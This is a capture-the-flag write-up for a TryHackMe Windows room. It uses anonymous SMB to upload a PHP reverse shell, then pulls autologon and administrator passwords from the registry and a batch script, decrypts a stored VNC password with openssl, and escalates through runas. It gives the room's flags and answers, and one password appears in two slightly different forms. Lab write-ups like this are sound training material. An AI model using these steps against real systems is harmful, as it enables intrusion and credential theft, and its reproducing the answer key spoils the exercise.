Room: https://tryhackme.com/room/allsignspoint2pwnage

I usually write my articles assuming the reader has little to no prior knowledge. However, this particular room was a bit lengthy and "not a straightforward one", so I'll be writing with the assumption that you'll be able to catch up with the flow as you progress through the room.

Friendly Access here!

Step 1: Nmap Scan

nmap -sS -sV -p- 10.10.140.232 -vv
None

How many TCP ports under 1024 are open?

6

Step 2: FTP Access

Logged into FTP using default/anonymous creds.

Found a notice.txt:

None

Step 3: SMB Enumeration

Anonymous access worked, found some image files, and uploaded reverse shell:

Pentestmonkey's reverse shell wasn't working need to use this one here!

None
smb shares
None
uploading reverse shell via smb

Reverse shell triggered via browser:

http://10.10.140.232/images/phpshell.php

What is the hidden share where images should be copied to?

images$

Step 4: Got Shell!

Started listener:

None

Enumeration

None
User flag

Who is signed into the console session? β†’ sign

What hidden, non-standard share is only remotely accessible as an admin? β†’ ADMIN$ (C:\Windows)

What is the content of user_flag.txt?

thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

Credential Discovery

As per the hint The user is automatically logged into the computer, On Windows, auto-login credentials are stored at: so command

Used this command:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Found:

DefaultUsername : .\sign
DefaultPassword : gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeS
None
user password

What is the user's password?

gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH

Now, admin password:

Checked Installs$ share (mapped to C:\Installs), used:

type C:\Installs\Install_www_and_deploy.bat

Checked Install_www_and_deploy.batand found:

psexec -u administrator -p RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi ...
None
admin password

What is the Administrators Password?

RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi

What executable is used to run the installer with the Administrator username and password?

PsExec.exe (we could see from above same file `psexec -u`)

VNC Password:

Located ultravnc.ini:

type "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini"

Found:

None

To decode, I used this logic:

GitHub - frizb/PasswordDecrypts: Handy Stored Password Decryption Techniques

Handy Stored Password Decryption Techniques. Contribute to frizb/PasswordDecrypts development by creating an account on…

github.com

run:

echo -n B3A8F2D8BEA2F1FA70 | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
None

What is the VNC Password?

5upp0rt9

Now last admin_flag.txt:

Connect via xvncviewer, rest of rdp tools weren't working for this room:

xvncviewer -QualityLevel 2 10.10.75.85
None
  • 1: Double click on the user_flag.txt
  • 2: Change the contents of the user_flag.txt file to be:
runas /user:administrator cmd.exe
  • 3: Save the file as pwn2.bat, and double click to run it:
None
  • 4: Used the previously found admin password when prompted.
None

Once admin shell opened:

type C:\Users\Administrator\Desktop\admin_flag.txt

What is the contents of the admin_flag.txt?

thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}

None